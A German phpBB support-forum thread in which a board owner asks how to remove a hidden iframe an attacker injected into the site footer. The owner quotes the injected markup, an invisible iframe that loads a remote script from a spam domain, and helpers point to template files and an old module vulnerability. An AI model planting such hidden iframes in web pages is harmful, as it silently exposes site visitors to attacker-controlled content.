Hilfe - Ein xxx spammer hat mich mit i-frame erwischt

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
ProData
Mitglied
Beiträge: 2
Registriert: 28.12.2007 08:22

Hilfe - Ein xxx spammer hat mich mit i-frame erwischt

Beitrag von ProData »

Hallo Gemeinde

Ich hab ein problem. ich hab zufaellig rausgekriegt dass ein spammer in meinem forum ein i-frame eingebaut hat.

Wie werd ich das wieder los? und wie kann ich verhindern das das passiert?
Kann ich das forum einfach updaten auf 3.0? Muss wohl zuerst das monster loswerden oder?

Das ganze sieht so aus:

Code: Alles auswählen

<div id="footermsg" style="width:100%">All Logos and Trademarks in this site are property of their respective owner.
All Comments and Forum Messages are property of their respective posters. 
All other Content is Copyright © 2004-2007 by 
<a href='http://www.diveshopsoftware.com'> DiveShopSoftware.com </a> Webdesign by 
<a href='http://www.prodata-software.com'> ProData Software for Dive Resorts</a> & <a href="http://newsletter-factory.com">Newsletter Software </a>Sponsor of <a href="http://kohtao-community.com">Koh Tao Community.com </a>

<iframe src="http://www.yourxxxblog.biz/js_go_f1.php" style="display:none"></iframe>

</div>

</body>
</html>
Nach oben
Benutzeravatar
gloriosa
Mitglied
Beiträge: 13770
Registriert: 04.01.2005 20:23
Wohnort: Landeshauptstadt Erfurt

Beitrag von gloriosa »

Hallo,
erst einmal den Code entfernen und dann Updaten (siehe dazu die >>> Update-Hilfe <<< :wink: ) ! :o

Weiterer Lesestoff : >>> KB:sicher <<< ! :wink:
Viele Grüße - gloriosa :D
Die einen schützen sich vor frischem Wind, während die anderen ihn nutzen.
Kein kostenloser MOD-Einbau usw. bzw. Support via PN, Email oder IRC !
Nach oben
ProData
Mitglied
Beiträge: 2
Registriert: 28.12.2007 08:22

Wo ist der code?

Beitrag von ProData »

Danke fuer die links. Kannst du mir vielleicht sagen wo der code zu entfernen ist und was mich noch mehr interessiert, wie kommt der da ueberhaupt rein? Das letztere ist mehr zum allgemeinen verstaendnis.
Der nichtsnutz hat doch gar keinen server zugriff...oder wie oder was?

Danke fuer die hilfe
Nach oben
Benutzeravatar
gloriosa
Mitglied
Beiträge: 13770
Registriert: 04.01.2005 20:23
Wohnort: Landeshauptstadt Erfurt

Beitrag von gloriosa »

Hallo,
das Warum und Wieso zu erörtern ist müßig, deshalb dazu keine Antwort. :D

Ansonsten solltest Du Dir die jeweilige index_body.tpl, overall_header.tpl und overall:footer.tpl ansehen. :wink:
Viele Grüße - gloriosa :D
Die einen schützen sich vor frischem Wind, während die anderen ihn nutzen.
Kein kostenloser MOD-Einbau usw. bzw. Support via PN, Email oder IRC !
Nach oben
Benutzeravatar
larsneo
Mitglied
Beiträge: 2622
Registriert: 07.03.2002 15:23
Wohnort: schwäbisch gmünd
Kontaktdaten:
Kontaktdaten von larsneo

Beitrag von larsneo »

wenn du von den seiten aus deiner signatur sprichst - hier solltest du unbedingt das zugrundeliegende cms aktualisieren sowie das forenmodul kontrollieren. ich hatte unlängst einen ähnlichen fall zur analyse der auf einer schwachstelle in /modules/PNphpBB2/includes/forums_admin.php beruhte (und eigentlich bereits seit 2005 gefixt ist)...
gruesse aus dem wilden sueden
larsneo
..::[krapohl.net]::..
Nach oben
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“